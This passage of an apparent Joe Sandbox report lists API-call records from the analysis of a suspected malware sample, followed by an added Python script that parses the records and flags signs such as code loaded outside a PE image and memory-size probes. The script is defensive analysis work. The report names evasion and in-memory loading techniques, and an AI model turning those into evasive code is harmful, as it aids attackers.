                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                      • String ID:
                      • API String ID: 1378193009-0
                      • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                      • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                      • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                      • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                      APIs
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                      • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                      • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                      • _memmove.LIBCMT ref: 004763D1
                      • inet_ntoa.WSOCK32(?), ref: 004763DC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 1504782959-0
                      • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                      • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                      • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                      • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                      • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                      • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                      • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                      • GetClientRect.USER32(?,?), ref: 0043B5FB
                      • GetCursorPos.USER32(?), ref: 0043B605
                      • ScreenToClient.USER32(?,?), ref: 0043B610
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Client$CursorLongProcRectScreenWindow
                      • String ID:
                      • API String ID: 4127811313-0
                      • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                      • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                      • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                      • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02F915D8,00000000,00000000,?,02F92132,02F915D8,00000000,00000000,00000000,?,02F92283,00000006,FlsSetValue), ref: 02F921BD
                      • GetLastError.KERNEL32(?,02F92132,02F915D8,00000000,00000000,00000000,?,02F92283,00000006,FlsSetValue,02FA6FC4,FlsSetValue,00000000,00000364,?,02F9192D), ref: 02F921C9
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02F92132,02F915D8,00000000,00000000,00000000,?,02F92283,00000006,FlsSetValue,02FA6FC4,FlsSetValue,00000000), ref: 02F921D7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: 2a4c21d86cdea79aa5581da8294a0114f2ac1c248165c1ed26b9aaeeabeafe22
                      • Instruction ID: 8c26aec8503f97a3adc6f93f7c1f38cc88298d0d4b2f13249cbac84912bfb667
                      • Opcode Fuzzy Hash: 2a4c21d86cdea79aa5581da8294a0114f2ac1c248165c1ed26b9aaeeabeafe22
                      • Instruction Fuzzy Hash: 4B018872F812267BFF224A69DC44A567B98AB45BE17110920EF15D7140D720D561CEF0
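Every block on this page is a Joe Sandbox IDA-plugin function summary: the APIs the function calls (with "Part of subcall function" marking calls one level down), the memory dump it was lifted from and whether that dump was backed by a PE image, then similarity and fuzzy-hash identifiers. The record directly above is the kind worth noticing: LoadLibraryExW resolving FlsSetValue from a region at 02F50000 marked "based on PE: false", that is, code running from memory that no on-disk image accounts for. The Python below is an added example, not Joe Sandbox code and not part of the report: it parses this record format and applies a few triage rules. The rules (non-image-backed code, runtime import resolution inside such code, process/thread token access, a memory-size probe next to Sleep) are the editor's assumptions about what to look at first, not verdicts; the embedded sample input is built from records on this page with argument lists shortened and the last three records merged into one.

```python
"""Parse Joe Sandbox IDA-plugin function records (the block format used on
this page) and flag the ones to triage first.

Added example, not Joe Sandbox code and not part of the report.  The
triage rules are the editor's assumptions: heuristics, not verdicts.
"""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR" or "• Name.LIBCMT ref: ADDR".  The
# optional "Part of subcall function X:" prefix marks a call made one
# level down, which the report lists under the calling function.
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Source File: <dump>.sdmp, Offset: <base>, based on PE: true|false"
SOURCE_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

@dataclass
class Record:
    apis: list = field(default_factory=list)  # (name, module, ref, is_subcall)
    offset: str = ""
    pe_backed: bool = True

    def calls(self, *names):
        return any(n in names for n, _, _, _ in self.apis)

def parse_records(text):
    """One Record per block; a block ends at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], Record()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            cur.apis.append((m["name"], m["module"], m["ref"], m["sub"] is not None))
        elif m := SOURCE_RE.match(line):
            cur.offset, cur.pe_backed = m["offset"], m["pe"] == "true"
        elif line.startswith("• Instruction Fuzzy Hash:"):
            records.append(cur)
            cur = Record()
    return records

LOADERS = ("LoadLibraryExW", "LoadLibraryW", "LoadLibraryA", "GetProcAddress")
TOKENS = ("OpenProcessToken", "OpenThreadToken")

def triage(records):
    """Return (offset, reason) pairs; the rules are assumptions (see docstring)."""
    findings = []
    for r in records:
        if not r.pe_backed:  # no on-disk image accounts for this code
            findings.append((r.offset, "code in memory not backed by a PE image"))
            if r.calls(*LOADERS):
                findings.append((r.offset, "non-image code resolving imports at runtime"))
        if r.calls(*TOKENS):
            findings.append((r.offset, "opens its own process/thread token"))
        if r.calls("GlobalMemoryStatusEx") and r.calls("Sleep"):
            findings.append((r.offset, "memory-size probe next to Sleep; check the threshold"))
    return findings

# Sample input built from records on this page: argument lists shortened,
# and the third block merges three separate records into one.
SAMPLE = """\
APIs
• GetCursorPos.USER32(?), ref: 0043B605
• ScreenToClient.USER32(?,?), ref: 0043B610
Memory Dump Source
• Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02F915D8,FlsSetValue), ref: 02F921BD
• GetLastError.KERNEL32(?,02F92132), ref: 02F921C9
Memory Dump Source
• Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
• Instruction Fuzzy Hash: 4B018872F812267BFF224A69DC44A567B98AB45BE17110920EF15D7140D720D561CEF0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00466BE6
  • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
• GetCurrentThread.KERNEL32 ref: 0045871B
• OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
• Sleep.KERNEL32(00000000), ref: 00412968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
Memory Dump Source
• Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
"""

if __name__ == "__main__":
    for offset, why in triage(parse_records(SAMPLE)):
        print(offset, why)
```

Run it against the full text of this page rather than the sample to get the complete list; the "based on PE: false" rule alone separates the 02F50000 region from the AutoIt runtime code at 00400000, which is where most of the GUI and CRT records on this page come from.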
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 0048B2E4
                      • ScreenToClient.USER32(?,?), ref: 0048B2FC
                      • ScreenToClient.USER32(?,?), ref: 0048B320
                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                      • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                      • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                      • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                        • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                      • _memmove.LIBCMT ref: 00466C09
                      • _memset.LIBCMT ref: 00466C16
                      • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CriticalSection_memset$EnterLeave_memmove
                      • String ID:
                      • API String ID: 48991266-0
                      • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                      • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                      • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                      • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00402231
                      • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                      • SetBkMode.GDI32(?,00000001), ref: 00402250
                      • GetStockObject.GDI32(00000005), ref: 00402258
                      • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                      • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                      • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                      • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                      • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                      • String ID:
                      • API String ID: 1946975507-0
                      • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                      • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                      • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                      • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 0045871B
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                      • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                      • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                      • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: %I
                      • API String ID: 0-63094095
                      • Opcode ID: f2f4929fe2eedd23798a4379a72baaa43463731a43e0617181cc308ff8d27f8c
                      • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                      • Opcode Fuzzy Hash: f2f4929fe2eedd23798a4379a72baaa43463731a43e0617181cc308ff8d27f8c
                      • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __itow_s
                      • String ID: xbL$xbL
                      • API String ID: 3653519197-3351732020
                      • Opcode ID: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                      • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                      • Opcode Fuzzy Hash: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                      • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: pow
                      • API String ID: 0-2276729525
                      • Opcode ID: c365b4ea0b4c1bf2f43f9a0daadf3d6d17f838ea2aa92b8c8e44ba4b5b5179f8
                      • Instruction ID: 81a02b8ae14e1ef72100cc1ebef06d201f70b58aadf8283f0a7b75502205012b
                      • Opcode Fuzzy Hash: c365b4ea0b4c1bf2f43f9a0daadf3d6d17f838ea2aa92b8c8e44ba4b5b5179f8
                      • Instruction Fuzzy Hash: F6517F72F082079AEF157714C94037BFBA4DB40BD4F508E78DB9A426A8EB3685D5CE42
                      APIs
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • __wcsnicmp.LIBCMT ref: 0046B02D
                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                      • String ID: LPT
                      • API String ID: 3222508074-1350329615
                      • Opcode ID: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
                      • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                      • Opcode Fuzzy Hash: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
                      • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00412968
                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                      • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                      • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                      • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                      APIs
                      Strings
                      Memory Dump Source
